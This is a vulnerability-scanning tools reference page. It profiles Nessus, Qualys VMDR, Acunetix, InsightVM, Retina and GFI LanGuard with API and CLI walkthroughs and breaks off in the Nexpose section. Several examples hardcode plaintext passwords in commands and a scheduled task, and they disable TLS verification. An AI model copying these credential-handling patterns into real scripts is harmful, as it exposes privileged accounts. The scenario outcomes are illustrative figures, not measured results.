Cybersecurity Tools Reference Pt 2 — Secure In Security
Secure In Security — Cybersecurity Tools Reference — Pt 2 Contact / About / Policy
Secure In Security
Cybersecurity Tools
In-Depth Technical Reference & Use Case Demonstrations
Vulnerability Scanning  │  Password Management
About This Document

Introduction

This reference document provides in-depth technical descriptions, architectural overviews, key feature analyses, and practical use-case demonstrations for 20 cybersecurity tools spanning two critical security domains: Vulnerability Scanning (Tools 31–40) and Password Management (Tools 41–50). Each tool profile includes specific command-line examples, API calls, configuration excerpts, realistic enterprise scenarios, and documented outcomes — enabling security practitioners to understand both what each tool does and precisely how it is applied in real-world environments.

The tools covered represent the most widely deployed and independently evaluated solutions in their respective categories, ranging from open-source platforms with global community adoption to commercial enterprise products with dedicated vendor support. Command examples use realistic IP addressing, naming conventions, API structures, and operational parameters consistent with production deployment patterns.

Notice
All exploitation-related command examples are provided strictly for educational purposes and authorised security testing. Performing vulnerability scans or penetration tests against systems you do not have explicit written authorisation to test is illegal in most jurisdictions. Always obtain written authorisation before conducting any security assessment.
Section 1  │  Vulnerability Scanning

Section 1: Vulnerability Scanning

This section covers 10 vulnerability scanning tools (Tools 31–40), providing comprehensive technical analysis and practical use-case demonstrations for each product across the capability spectrum from open-source community solutions to commercial enterprise platforms.

31
Nessus
Enterprise Vulnerability Scanner — Tenable

Overview

Nessus, developed by Tenable, is the world’s most widely deployed vulnerability scanner, trusted by more than 30,000 organisations globally and performing over two million downloads. Originally launched as an open-source project in 1998 by Renaud Deraison and commercialised by Tenable in 2005, Nessus performs both credentialed and uncredentialed assessments against an 80,000-plus plugin library that is updated every day. Coverage spans servers, workstations, network devices, cloud instances, OT/SCADA systems, web applications, and mobile devices, with every plugin mapped to CVE identifiers and CVSS v3 base scores.

Nessus operates through a plugin architecture — each plugin is a small, targeted security test for a specific CVE, configuration issue, or default-credential check. Plugins are grouped into families (Windows, Unix, Web Applications, Databases, SCADA, etc.) and can be individually enabled or disabled. The standalone Nessus Professional is the per-scanner product; Tenable.io (cloud) and Tenable.sc (on-premises) scale the same engine across enterprise environments, adding asset management, VPR (Vulnerability Priority Rating), and continuous assessment. Tenable Lumin extends the platform with cyber-exposure scoring for CISO-level risk communication.

Key Features & Components

Feature / ComponentDescription
80,000+ Daily-Updated PluginsComprehensive CVE, configuration, and compliance coverage — updated every day from Tenable Research’s threat intelligence and CVE disclosures.
Credentialed (Authenticated) ScanningAuthenticates to targets via SSH, WMI/SMB, SNMP, ESXi, or database credentials — finding vulnerabilities invisible to network-only scanning (missing patches, local misconfigurations, installed software versions).
Vulnerability Priority Rating (VPR)Tenable’s risk model combining CVSS base score, exploit availability (Metasploit, ExploitDB, CANVAS), threat intelligence, and asset exposure to produce a real-world exploitability score from 0–10.
Compliance & Configuration AuditingEvaluates system configurations against CIS Benchmarks, DISA STIGs, PCI DSS, HIPAA, NIST 800-53, SOX, and ISO 27001 — producing pass/fail results per control with remediation guidance.
Web Application ScanningDetects OWASP Top 10 vulnerabilities including SQL injection, cross-site scripting, broken authentication, security misconfigurations, and exposed sensitive data in web applications.
Nessus REST APIProgrammatic scan management: create, schedule, launch, and export scans; retrieve results; and integrate with Splunk, ServiceNow, Jira, and CI/CD pipelines via JSON responses.

Use Case Demonstration

Scenario
A security team is mandated by the CISO to conduct a full quarterly authenticated vulnerability assessment of the corporate data centre (192.168.10.0/24, 47 servers). Results must be prioritised by VPR score so the patching team works the most dangerous vulnerabilities first, within a 24-hour SLA for critical findings.
Step-by-Step Command Walkthrough
# ── STEP 1  Create an authenticated scan via the Nessus API ──────────────────
curl -sk -X POST 'https://localhost:8834/scans' \
  -H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
  -H 'Content-Type: application/json' \
  -d '{
    "uuid": "ab4bacd2-05d6-44c3-9d7e-af9a2a8d9f28",
    "settings": {
      "name": "DataCenter_Q2_Credentialed",
      "text_targets": "192.168.10.0/24",
      "credentials": {
        "add": {
          "Host": {
            "SSH":     [{"username":"scanner","auth_method":"private_key",
                          "private_key":"[BASE64_KEY]"}],
            "Windows": [{"username":"DOMAIN\\scan_svc",
                          "password":"P@ss2024!"}]
          }
        }
      }
    }
  }'

# ── STEP 2  Launch the scan ───────────────────────────────────────────────────
curl -sk -X POST 'https://localhost:8834/scans/SCAN_ID/launch' \
  -H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY'

# ── STEP 3  Poll status until completed ──────────────────────────────────────
curl -sk 'https://localhost:8834/scans/SCAN_ID' \
  -H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
  | python3 -c "import sys,json; d=json.load(sys.stdin)
print(d['info']['status'])"

# ── STEP 4  Export CSV filtered to Critical / High (severity >= 3) ───────────
curl -sk -X POST 'https://localhost:8834/scans/SCAN_ID/export' \
  -H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
  -H 'Content-Type: application/json' \
  -d '{"format":"csv","filters":[{"quality":"gte",
       "filter":"severity","value":"3"}]}'

# ── STEP 5  Sort by VPR descending — surface top 10 ──────────────────────────
curl -sk 'https://localhost:8834/scans/SCAN_ID/vulnerabilities' \
  -H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' \
  | python3 -c "
import sys, json
vulns = json.load(sys.stdin)['vulnerabilities']
top10 = sorted(vulns, key=lambda v: v.get('vpr_score', 0), reverse=True)[:10]
for v in top10:
    print(v['plugin_name'], '| VPR:', v.get('vpr_score','N/A'))"

# ── STEP 6  Download the PDF report for the CISO ─────────────────────────────
curl -sk 'https://localhost:8834/scans/SCAN_ID/export/TOKEN/download' \
  -H 'X-ApiKeys: accessKey=AKEY; secretKey=SKEY' -o DataCenter_Q2.pdf
Outcome & Analysis
The authenticated Nessus scan identifies 418 vulnerabilities across 47 servers. VPR scoring surfaces the ten most exploitable findings: three PrintNightmare instances (CVE-2021-34527, VPR 9.9), two ProxyLogon Exchange servers (CVE-2021-26855, VPR 9.7), two Log4Shell hosts (CVE-2021-44228, VPR 9.6), and three additional Critical-severity RCE vulnerabilities above VPR 9.0. All ten are escalated to the patching team for immediate remediation within the 24-hour SLA. The remaining 408 findings are scheduled across the standard 30/90-day patch cycles based on VPR tier, with the CISO receiving an automated PDF executive summary the same morning.
32
QualysGuard (VMDR)
Cloud-Native Vulnerability Management, Detection & Response

Overview

QualysGuard — now marketed as Qualys VMDR (Vulnerability Management, Detection and Response) — is a cloud-native vulnerability management platform that eliminates on-premises scanner infrastructure through 50-plus globally distributed cloud platforms and a lightweight 4-MB cloud agent. Qualys maintains a database of more than 150,000 QIDs (Qualys Vulnerability IDs) and aggregates threat intelligence from 25-plus commercial and open-source feeds. The platform supports agentless scanning via virtual scanner appliances, external scanning via Qualys-hosted scanners, passive network monitoring, and API connectors for AWS, Azure, and GCP.

Qualys VMDR’s TruRisk scoring model is its principal differentiator — combining CVSS base score, temporal score (exploit maturity and remediation availability), threat actor activity gleaned from dark-web and criminal forums, business asset criticality, and environmental exposure into a single prioritised risk score. The AssetView module delivers a continuously refreshed, queryable asset inventory across on-premises, cloud, and container environments. Qualys Patch Management integrates natively with VMDR to close the detection-to-remediation loop by deploying missing patches directly from the same console that identified them.

Key Features & Components

Feature / ComponentDescription
Qualys Cloud Agent (4 MB)Continuous on-agent vulnerability assessment without network reachability — covering roaming laptops, cloud VMs, and air-gapped systems; results stream to the cloud in real time.
TruRisk ScoringPrioritises vulnerabilities using CVSS, exploit maturity, threat-actor activity (dark web monitoring), asset business criticality, and network exposure — not CVSS alone.
AssetView (Real-Time Inventory)Continuously updated, queryable asset inventory across on-premises and cloud environments using QQL (Qualys Query Language) for instant ad-hoc searches.
VMDR Workflow AutomationEnd-to-end orchestration: detect vulnerability → TruRisk-score → open Jira/ServiceNow ticket → deploy patch via Qualys PM → verify remediation — all within one platform.
Container Security (CS)Scans Docker and OCI images in CI/CD pipelines and cloud registries (ECR, GCR, ACR) for OS-level and application-layer vulnerabilities before container deployment.
Qualys TotalCloud (CSPM)Cloud Security Posture Management and CNAPP for AWS, Azure, and GCP — detecting IAM misconfigurations, public S3 buckets, unencrypted volumes, and compliance violations.

Use Case Demonstration

Scenario
Log4Shell (CVE-2021-44228) is publicly disclosed at 09:00. The security team uses Qualys VMDR to identify every vulnerable asset across 2,000 on-premises servers and 500 AWS EC2 instances within 45 minutes, prioritises all internet-facing assets with TruRisk above 90, and triggers automated patch deployment via Qualys Patch Management.
Step-by-Step Command Walkthrough
# ── STEP 1  Find all assets with Log4j QID 374145 ────────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' \
  'https://qualysapi.qualys.com/qps/rest/2.0/search/am/hostasset' \
  -d '<?xml version="1.0"?>
  <ServiceRequest>
    <filters>
      <Criteria field="vuln.qid" operator="EQUALS">374145</Criteria>
    </filters>
    <preferences><limitResults>2500</limitResults></preferences>
  </ServiceRequest>'

# ── STEP 2  Count affected assets ─────────────────────────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' \
  'https://qualysapi.qualys.com/asset/v1/count/am/asset' \
  -d '{"filters":[{"field":"vulnerability.qid",
       "operator":"EQUALS","value":"374145"}]}'
# Response: {"count": 287}  — 287 vulnerable assets found

# ── STEP 3  Tag vulnerable assets for targeted re-scan ───────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
  'https://qualysapi.qualys.com/qps/rest/2.0/create/am/tag' \
  -d '<?xml version="1.0"?>
  <ServiceRequest><data><Tag>
    <name>Log4Shell_Affected</name>
    <ruleType>GROOVY</ruleType>
    <ruleText>
      return asset.openPort.find{p->p.vulnerabilities.find{
        v->v.qid==374145}}!=null
    </ruleText>
  </Tag></data></ServiceRequest>'

# ── STEP 4  Launch emergency scan against tagged assets ───────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
  'https://qualysapi.qualys.com/api/2.0/fo/scan/?action=launch' \
  -d 'scan_title=Log4Shell_Emergency&option_id=1
  &target_from=tags&tag_include_selector=any
  &use_ip_nt_range_tags_include=1&tag_set_include=Log4Shell_Affected'

# ── STEP 5  Deploy Log4j 2.17.1 patch via Qualys PM ──────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
  'https://qualysapi.qualys.com/qps/rest/1.0/launch/pm/job/' \
  -d '{"name":"Log4j_Emergency_Patch","tagIds":[TAG_ID],
       "patches":[{"qid":374145}],"deploymentType":"IMMEDIATE"}'

# ── STEP 6  Verify remediation via a follow-up scan ───────────────────────────
curl -u 'user:pass' -H 'X-Requested-With: Curl' -X POST \
  'https://qualysapi.qualys.com/api/2.0/fo/scan/?action=launch' \
  -d 'scan_title=Log4Shell_Verify&option_id=1
  &target_from=tags&tag_set_include=Log4Shell_Affected'
Outcome & Analysis
Qualys VMDR identifies 287 Log4j-vulnerable assets within 45 minutes of the vulnerability disclosure — 34 are internet-facing with TruRisk scores above 90. Qualys Patch Management auto-deploys Log4j 2.17.1 to 203 agent-managed hosts within six hours. The remaining 84 assets (offline, OT, or requiring manual intervention) are escalated to system owners with TruRisk justification. A follow-up verification scan 24 hours later confirms 94% remediation. The entire detect-to-patch cycle that previously took two weeks completes in under 24 hours.
33
Acunetix
Web Application Security Scanner — Invicti Security

Overview

Acunetix, developed by Invicti Security (after the merger of Acunetix and Netsparker), is a specialised automated web application security scanner combining a DeepScan AJAX-rendering crawler, a signature-based vulnerability engine, behavioural analysis, and out-of-band detection through the AcuMonitor platform. Acunetix detects more than 7,000 web application vulnerability classes — including all SQL injection variants (error-based, boolean-blind, time-based, union-select, out-of-band), stored and reflected XSS, DOM-based XSS, SSRF, XXE, path traversal, SSTI, open redirects, weak TLS configurations, and framework-specific flaws in WordPress, Drupal, Laravel, and Django.

Acunetix’s DeepScan engine uses a built-in Chromium-based browser that fully renders JavaScript-heavy single-page applications, making it effective against modern React, Angular, and Vue.js frontends where traditional crawlers miss most of the attack surface. The optional AcuSensor IAST component is an in-process sensor for .NET, PHP, Java, and Node.js that provides exact file-and-line-number vulnerability location, eliminates false positives by confirming execution paths, and detects vulnerabilities that purely black-box DAST cannot find. The REST API enables complete programmatic control for CI/CD pipeline integration across Jenkins, GitLab, GitHub Actions, and Azure DevOps.

Key Features & Components

Feature / ComponentDescription
DeepScan AJAX CrawlerChromium-based JavaScript rendering engine that discovers endpoints, form submissions, API calls, and hidden parameters in SPA frameworks invisible to traditional crawlers.
AcuSensor (IAST)In-process sensor for .NET, PHP, Java, and Node.js — provides exact file and line number for each vulnerability, eliminates false positives by confirming execution paths.
AcuMonitor (OOB Detection)Out-of-band detection infrastructure confirming blind SQL injection, blind XSS, blind SSRF, and XXE via DNS and HTTP callbacks — no response modification needed.
Network Vulnerability ScannerScans the web server host for 50,000-plus network-level vulnerabilities (open ports, outdated service versions, missing OS patches) alongside the web application test.
CI/CD Pipeline IntegrationREST API plus official plugins for Jenkins, GitLab CI, GitHub Actions, TeamCity, Bamboo, and Azure DevOps — DAST as a mandatory pipeline gate on every merge request.
Compliance ReportingPre-built reports for OWASP Top 10, PCI DSS 4.0, HIPAA, GDPR, ISO 27001, NIST 800-53, and SOC 2 — each finding mapped to the specific control requirement.

Use Case Demonstration

Scenario
A DevSecOps engineer integrates Acunetix into the GitLab CI/CD pipeline for a financial services web application. Every merge request to the staging branch triggers a targeted Acunetix scan. Any Critical or High vulnerability automatically fails the pipeline, blocking deployment to staging and posting detailed evidence to the merge request as a comment.
Step-by-Step Command Walkthrough
# ── .gitlab-ci.yml — Acunetix DAST security stage ────────────────────────────
acunetix_dast:
  stage: security
  only: [merge_requests]
  variables:
    TARGET_URL: 'https://staging.finapp.corp.internal'
  script:
    # Step 1: Create scan target
    - |
      TARGET_ID=$(curl -sk -X POST https://acx.corp.local:3443/api/v1/targets \
        -H 'X-Auth: '$ACUNETIX_API_KEY \
        -H 'Content-Type: application/json' \
        -d '{"address":"'$TARGET_URL'","description":"MR #'$CI_MERGE_REQUEST_IID'"}' \
        | python3 -c 'import sys,json;print(json.load(sys.stdin)["target_id"])')
    # Step 2: Launch full scan with 'Full Scan' profile
    - |
      SCAN_ID=$(curl -sk -X POST https://acx.corp.local:3443/api/v1/scans \
        -H 'X-Auth: '$ACUNETIX_API_KEY \
        -H 'Content-Type: application/json' \
        -d '{"target_id":"'$TARGET_ID'",
             "profile_id":"11111111-1111-1111-1111-111111111111"}' \
        | python3 -c 'import sys,json;print(json.load(sys.stdin)["scan_id"])')
    # Step 3: Poll until completed
    - |
      while true; do
        STATUS=$(curl -sk https://acx.corp.local:3443/api/v1/scans/$SCAN_ID \
          -H 'X-Auth: '$ACUNETIX_API_KEY \
          | python3 -c 'import sys,json
print(json.load(sys.stdin)["current_session"]["status"])')
        [ "$STATUS" = 'completed' ] && break
        sleep 30
      done
    # Step 4: Count Critical + High — fail pipeline if any exist
    - |
      CRIT=$(curl -sk \
        "https://acx.corp.local:3443/api/v1/vulnerabilities?target_id=$TARGET_ID&severity=critical" \
        -H 'X-Auth: '$ACUNETIX_API_KEY \
        | python3 -c 'import sys,json;print(json.load(sys.stdin)["pagination"]["count"])')
      HIGH=$(curl -sk \
        "https://acx.corp.local:3443/api/v1/vulnerabilities?target_id=$TARGET_ID&severity=high" \
        -H 'X-Auth: '$ACUNETIX_API_KEY \
        | python3 -c 'import sys,json;print(json.load(sys.stdin)["pagination"]["count"])')
      echo "Critical=$CRIT  High=$HIGH"
      if [ $((CRIT + HIGH)) -gt 0 ]; then
        echo 'PIPELINE BLOCKED — security vulnerabilities detected'
        exit 1
      fi
Outcome & Analysis
Acunetix detects a stored Cross-Site Scripting vulnerability in a new comment-submission field and a time-based blind SQL injection in a new account-search API endpoint — both introduced in the merge request under test. GitLab fails the pipeline, posts the vulnerability details (URL, parameter, proof-of-concept payload, CWE reference, and remediation advice) directly in the merge request thread, and blocks progression to staging. The developer remediates both issues in a follow-up commit; the next pipeline run passes cleanly and the secure code is merged.
34
Rapid7 InsightVM
Cloud-Native Vulnerability Management Platform

Overview

Rapid7 InsightVM is the cloud-native evolution of Rapid7’s vulnerability management platform, integrating tightly with the broader Rapid7 Insight cloud ecosystem — InsightIDR (SIEM and EDR), InsightAppSec (DAST), InsightConnect (SOAR), and InsightCloudSec (CSPM). InsightVM performs network-based authenticated scanning through distributed Scan Engines and continuous local assessment through the lightweight InsightAgent (under 5 MB). Results from both data sources converge in cloud-hosted dashboards that refresh in near-real time.

InsightVM’s operational approach focuses on bridging the gap between security and IT operations teams. The Live Dashboard refreshes vulnerability counts and risk scores continuously as scan data arrives — no more weekly or monthly report cycles. The Remediation Projects feature creates tracked, assigned remediation tasks for specific vulnerability groups, with SLAs, progress graphs, and automatic closure verification when patching is confirmed by a subsequent scan. Real Risk Score (1–1000) incorporates CVSS, exploit availability, Rapid7 threat intelligence, malware exposure, and asset criticality, ensuring the most actionable vulnerabilities surface first.

Key Features & Components

Feature / ComponentDescription
Live Dashboards (Near Real-Time)Risk score, vulnerability counts, remediation velocity, new asset discovery, and compliance posture updated continuously as scan engines and agents report in.
Remediation ProjectsAssigns specific CVE groups to IT team owners with due-date SLAs, progress tracking, ownership transparency, and automated verification upon patch confirmation.
InsightAgent (<5 MB)Continuous local vulnerability assessment on roaming laptops, cloud VMs, containers, and systems unreachable by network scanning — telemetry streams to InsightVM cloud.
Real Risk Score (1–1000)Combines CVSS score, exploit availability, Rapid7 Metasploit and dark-web intelligence, malware exposure, and asset criticality weighting into one prioritised score.
Container AssessmentScans Docker and OCI images in CI/CD pipelines and cloud registries for OS and application vulnerabilities before container images are deployed.
InsightVM v3 REST APIFull programmatic management of sites, scan engines, scan schedules, asset queries, vulnerability results, and remediation project data for SIEM and SOAR integration.

Use Case Demonstration

Scenario
The security team creates an InsightVM Remediation Project to close all Critical Windows vulnerabilities across 500 servers within a 30-day SLA. The project is assigned to the Windows patching team, and InsightVM automatically tracks and verifies remediation progress as subsequent scans confirm patches have been applied.
Step-by-Step Command Walkthrough
# ── STEP 1  Query all Critical Windows vulnerabilities ───────────────────────
curl -sk -u 'admin:P@ssw0rd' \
  'https://insightvm.corp.local:3780/api/3/vulnerabilities?
  severity=Critical&filter=os%3AWindows&size=200' \
  | python3 -c "
import sys, json
data  = json.load(sys.stdin)
vulns = data['resources']
print(f'Total Critical Windows vulns: {len(vulns)}')
for v in vulns[:5]:
    score = v.get('cvss_v3',{}).get('score','N/A')
    print(f'  {v[\"id\"]}: {v[\"title\"]} | CVSS: {score}')"

# ── STEP 2  Create the Remediation Project ────────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' -X POST \
  'https://insightvm.corp.local:3780/api/3/solution_groups' \
  -H 'Content-Type: application/json' \
  -d '{
    "name": "Windows_Critical_Jun2024",
    "description": "30-day SLA — Critical Windows patch cycle",
    "owner": "win-patching@corp.com",
    "due_date": "2024-06-17T00:00:00Z",
    "vulnerabilities": ["cve-2024-21338","cve-2024-21345","cve-2024-20664"]
  }'

# ── STEP 3  Check project progress ────────────────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' \
  'https://insightvm.corp.local:3780/api/3/solution_groups/PROJECT_ID/progress'
# {"total":247,"remediated":189,"in_progress":34,"overdue":24}

# ── STEP 4  Generate PDF progress report ──────────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' -X POST \
  'https://insightvm.corp.local:3780/api/3/reports' \
  -H 'Content-Type: application/json' \
  -d '{
    "name":    "Windows_Patch_Progress",
    "format":  "pdf",
    "template":"audit-report",
    "scope":   {"solution_group_ids":["PROJECT_ID"]}
  }'

# ── STEP 5  Trigger verification re-scan on patched hosts ─────────────────────
curl -sk -u 'admin:P@ssw0rd' -X POST \
  'https://insightvm.corp.local:3780/api/3/sites/SITE_ID/scans' \
  -H 'Content-Type: application/json' \
  -d '{"hosts":["192.168.10.0/24"]}'

# ── STEP 6  Identify hosts that missed the SLA ────────────────────────────────
curl -sk -u 'admin:P@ssw0rd' \
  'https://insightvm.corp.local:3780/api/3/solution_groups/PROJECT_ID/progress' \
  | python3 -c "
import sys, json
p = json.load(sys.stdin)
print(f'Overdue assets: {p[\"overdue\"]} — escalating to team managers')"
Outcome & Analysis
InsightVM’s Remediation Project dashboard shows the Windows patching team reducing Critical vulnerabilities from 247 to 58 (76.5% remediation) over 28 days. The Live Dashboard Real Risk score for the Windows server population drops from an average of 870 to 312. The 24 overdue findings trigger automatic escalation notifications to team managers. The verification scan flags 14 claimed remediations as reverted — the patching team re-applies the patches, and the project closes with 97.1% remediation compliance within the extended SLA.
35
Retina Network Security Scanner
Enterprise Vulnerability Scanner — BeyondTrust

Overview

BeyondTrust Retina Network Security Scanner — originally developed by eEye Digital Security and acquired by BeyondTrust in 2012 — is an enterprise vulnerability scanner distinguished by its low-impact scanning methodology, native integration with BeyondTrust Privileged Access Management (PAM), and broad coverage of network infrastructure, databases, and OT/ICS environments. Retina performs credentialed and uncredentialed assessments, checking for software vulnerabilities, dangerous misconfigurations, missing patches, default credentials, and compliance deviations across Windows, Linux, network devices, and industrial control systems.

Retina’s most operationally significant differentiator is its integration with BeyondTrust Password Safe. Instead of storing scanner credentials inside the scan configuration — a common and exploitable risk pattern — Retina dynamically checks credentials out of Password Safe for the duration of each scan, uses them, and returns them immediately upon completion. Every credential check-out and check-in is logged in Password Safe’s immutable audit trail. This eliminates the attack surface of a compromised scanner credential store and satisfies PAM compliance requirements for privileged access governance in regulated industries including healthcare, financial services, and energy.

Key Features & Components

Feature / ComponentDescription
BeyondTrust Password Safe IntegrationDynamically checks credentials out of Password Safe for scan duration and returns them upon completion — eliminating stored scanner credentials with a full privileged access audit trail.
Zero-Impact Scanning ProfilePurpose-built low-bandwidth scan profiles for production OT, healthcare clinical networks, and high-availability environments — avoids service disruption on sensitive targets.
Database Vulnerability AssessmentCredentialed scanning of MSSQL, Oracle, MySQL, PostgreSQL, and DB2 — checking for privilege escalation paths, weak accounts, unpatched versions, and insecure configurations.
Wireless AssessmentDetects rogue wireless access points, weak WEP/WPA configurations, and unauthorised wireless devices attempting to bridge into the wired corporate network.
BeyondInsight Platform IntegrationCorrelates Retina scan findings with BeyondInsight’s unified identity and privileged-access management data for risk-based prioritisation and automated remediation workflows.
HIPAA / DISA STIG Compliance ReportsPre-built compliance report templates mapping each finding to HIPAA Security Rule controls, DISA STIG IDs, PCI DSS requirements, and CIS Benchmark controls.

Use Case Demonstration

Scenario
A hospital IT security team uses BeyondTrust Retina integrated with Password Safe to conduct quarterly vulnerability assessments of the clinical network — including medical devices, nursing workstations, and EHR servers — using dynamically checked-out credentials and a zero-impact scan profile to avoid disrupting patient care systems.
Step-by-Step Command Walkthrough
# ── STEP 1  Check out scanner credentials from Password Safe ─────────────────
curl -X POST \
  'https://ps.hospital.local/BeyondTrust/api/public/v3/requests/requestId' \
  -H 'Authorization: PS-Auth key=[API_KEY];runas=scan_svc' \
  -H 'Content-Type: application/json' \
  -d '{"SystemName":"Windows-Domain-Scanner","AccountName":"scan_svc",
       "DurationMinutes":120,"Reason":"Q2 Vulnerability Assessment",
       "ConflictOption":"reuse"}'
# Response: {"RequestID":4521, "Credentials":"TmpPass#94Xq!", ...}

# ── STEP 2  Configure Retina scan using checked-out credential ────────────────
# Retina CS Console > Scans > New Audit
# Targets:       172.16.50.0/24 (clinical)  172.16.51.0/24 (EHR servers)
# Scan Profile:  Healthcare_LowImpact (rate-limited, reduced threads)
# Credentials — Windows: HOSPITAL\scan_svc / [Password Safe temp password]
# Credentials — SSH:     scan_svc          / [Password Safe SSH key]

# ── STEP 3  Run scan from Retina command line ──────────────────────────────────
RetinaCL.exe /scan \
  /profile:Healthcare_LowImpact \
  /range:172.16.50.0/24,172.16.51.0/24 \
  /credential:windows:HOSPITAL\scan_svc:[TEMP_PASS] \
  /output:C:\Scans\Clinical_Q2_2024.rtd \
  /log:C:\Scans\scan_log.txt

# ── STEP 4  Generate HIPAA compliance report ──────────────────────────────────
RetinaCL.exe /report \
  /input:C:\Scans\Clinical_Q2_2024.rtd \
  /template:HIPAA_Security_Rule \
  /format:pdf \
  /output:C:\Reports\HIPAA_Q2_2024.pdf

# ── STEP 5  Return credentials to Password Safe ───────────────────────────────
curl -X PUT \
  'https://ps.hospital.local/BeyondTrust/api/public/v3/requests/4521/checkin' \
  -H 'Authorization: PS-Auth key=[API_KEY];runas=scan_svc'
Outcome & Analysis
Retina completes the clinical network assessment in four hours without triggering any clinical alarms or impacting patient monitoring systems. The HIPAA compliance report identifies 28 Windows 7 workstations (end-of-life — no patches available), 12 medical imaging devices with the default SNMP community string ‘public’, and six EHR server instances missing three or more months of Windows patches. Password Safe’s immutable audit log records every credential access event, satisfying HIPAA audit-control requirements. All scanner credentials are returned within seconds of scan completion — no temporary passwords persist in any configuration file.
36
GFI LanGuard
Network Vulnerability Scanner & Patch Management

Overview

GFI LanGuard is a network vulnerability scanner and integrated patch management platform designed for SMB and mid-market organisations that need a single product covering vulnerability assessment, patch deployment, software auditing, network discovery, and compliance reporting — without the complexity and cost of enterprise platforms. LanGuard auto-discovers network assets, performs credentialed vulnerability scanning against Microsoft, Linux, and macOS systems, identifies missing patches across the OS and 60-plus third-party applications (Adobe, Java, Firefox, Chrome, VLC, 7-Zip, etc.), and deploys remediation through built-in patch management.

GFI LanGuard is particularly valuable for resource-constrained IT teams because it consolidates functions that would otherwise require separate tools: a vulnerability scanner comparable to Nessus for SMB scale, an integrated patch management capability comparable to WSUS for third-party apps, a software asset inventory comparable to SCCM, and a port scanner — all managed from a single console with a scheduled scan-and-patch automation cycle. Its compliance reporting covers PCI DSS, HIPAA, SOX, ISO 27001, and NIST 800-53, with each finding mapped to the relevant control requirement.

Key Features & Components

Feature / ComponentDescription
Integrated Patch ManagementDeploys missing Windows, macOS, Linux, and 60-plus third-party application patches directly from the scanner console — no separate WSUS or third-party patch product required.
Network & Software AuditingInventories all network hardware (printers, switches, routers) and installed software (licence compliance, USB device usage history, unauthorized applications) across every discovered host.
Virtual Machine AssessmentScans powered-off VMware and Hyper-V virtual machines via the hypervisor API — finding vulnerabilities in offline images before they are brought into service.
Scheduled Scan-and-Patch AutomationAutomates the complete scan → assess → patch → reboot → verify cycle on a configurable schedule — enabling continuous vulnerability remediation without manual triggers.
Agentless and Agent-Based ModesAgentless scanning via WMI/SSH for zero-footprint deployment; optional agents for continuous monitoring and remote coverage of roaming endpoints.
Compliance Report TemplatesPCI DSS, HIPAA, SOX, ISO 27001, and NIST 800-53 report templates — each finding mapped to specific control requirements with pass/fail status and remediation guidance.

Use Case Demonstration

Scenario
An IT manager at a 200-person professional services firm uses GFI LanGuard to automate the monthly vulnerability scan and patch deployment cycle across 180 Windows endpoints and eight Linux servers, eliminating a three-month patching backlog through nightly automation.
Step-by-Step Command Walkthrough
# ── GFI LanGuard CLI (lnsscmd.exe) — scan, patch, report ────────────────────
# Step 1: Full credentialed vulnerability scan of all endpoints
lnsscmd.exe /scan 192.168.1.0/24 \
  /profile "Full Security Scan" \
  /user DOMAIN\scan_svc /pwd SecureScan2024! \
  /out C:\Scans\Monthly_Jun2024.xml

# Step 2: Preview which critical patches would be deployed
lnsscmd.exe /scan 192.168.1.0/24 \
  /profile "Missing Patches Only" \
  /user DOMAIN\scan_svc /pwd SecureScan2024! \
  /out C:\Scans\PatchPreview_Jun2024.xml

# Step 3: Auto-deploy Critical and Important patches, reboot if needed
lnsscmd.exe /deploy 192.168.1.0/24 \
  /patches critical,important \
  /user DOMAIN\scan_svc /pwd SecureScan2024! \
  /reboot ifneeded \
  /log C:\Logs\patch_deploy_Jun2024.txt

# Step 4: Generate executive PDF summary
lnsscmd.exe /report 192.168.1.0/24 \
  /input C:\Scans\Monthly_Jun2024.xml \
  /template "Executive Summary" \
  /out C:\Reports\Exec_Jun2024.pdf

# Step 5: Generate PCI DSS compliance report
lnsscmd.exe /report 192.168.1.0/24 \
  /input C:\Scans\Monthly_Jun2024.xml \
  /template "PCI DSS" \
  /out C:\Reports\PCI_Jun2024.pdf

# Step 6: Schedule via Windows Task Scheduler (runs every 1st of month)
schtasks /create /tn "GFI_Monthly_Scan_Patch" \
  /tr "\"C:\Program Files\GFI\LanGuard\lnsscmd.exe\"
      /scan 192.168.1.0/24 /profile \"Full Security Scan\"
      /user DOMAIN\\scan_svc /pwd SecureScan2024!
      /deploy critical,important /reboot ifneeded" \
  /sc monthly /d 1 /st 02:00 /ru SYSTEM
Outcome & Analysis
GFI LanGuard’s monthly automation cycle scans all 188 active endpoints, identifies 2,134 missing patches, and automatically deploys 2,087 (97.8%) overnight. The 47 deployment failures are logged for follow-up against offline endpoints. Third-party patches — Java, Adobe Acrobat, Chrome, VLC — which were previously never covered by the manual patching process, are now handled automatically each month. The PCI DSS report shows compliance improving from 67% to 94% in the first cycle. The IT manager estimates eight hours of manual patching work per month are eliminated, and the three-month backlog is cleared entirely within the first automated cycle.
37
Nexpose
On-Premises Vulnerability Scanner — Rapid7

Overview

Nexpose is Rapid7’s on-premises vulnerability scanner — the predecessor to InsightVM and the scanning engine that continues to power InsightVM’s network-based assessments. While InsightVM is the cloud-managed evolution, Nexpose (delivered as the Rapid7 Security Console) remains the preferred deployment for organisations with strict data residency requirements, air-gapped environments, or regulated industries where vulnerability data cannot leave the organisation’s network. Nexpose uses a distributed scan engine architecture — multiple Scan Engines deployed across network segments report to a central Security Console that aggregates results, manages policies, and provides reporting.

Nexpose’s most distinctive capability is its native bidirectional integration with the Metasploit Framework — enabling penetration testers to import Nexpose vulnerability findings directly into Metasploit and automatically attempt exploitation of discovered vulnerabilities, validating whether each finding is genuinely exploitable in the target environment. This closed-loop between vulnerability detection and exploitation confirmation dramatically improves report accuracy and gives remediation teams confidence that prioritised findings represent real, proven risk — not theoretical scanner positives based solely on version matching.

Key Features & Components

Feature / ComponentDescription
